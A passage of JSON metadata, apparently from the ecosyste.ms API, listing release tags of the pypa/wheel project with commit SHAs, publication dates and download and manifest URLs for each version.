ypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel